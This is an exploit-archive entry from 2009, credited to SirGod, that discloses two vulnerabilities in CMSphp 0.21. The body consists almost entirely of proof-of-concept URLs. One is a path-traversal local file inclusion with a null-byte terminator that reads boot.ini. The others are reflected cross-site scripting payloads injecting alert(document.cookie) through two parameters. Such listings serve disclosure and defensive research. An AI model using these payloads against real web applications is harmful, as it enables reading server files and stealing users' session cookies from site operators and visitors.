CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities

2009-07-30T00:00:00
ID 1337DAY-ID-5580
Type zdt
Reporter SirGod
Modified 2009-07-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities
=====================================================


###################################################################################################
[+] CMSphp 0.21 (LFI/XSS) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
###################################################################################################

[+] Download : http://sourceforge.net/projects/cmsphp/

[+] Local File Inclusion

 - PoC

    http://127.0.0.1/path/modules.php?name=Your_account&mod_file=../../../../../../boot.ini%00

[+] Cross-Site Scripting

 - PoC's

    http://127.0.0.1/path/index.php?cook_user=<script>alert(document.cookie)</script>

    http://127.0.0.1/path/modules.php?name=<script>alert(document.cookie)</script>

###################################################################################################



#  0day.today [2018-01-17]  #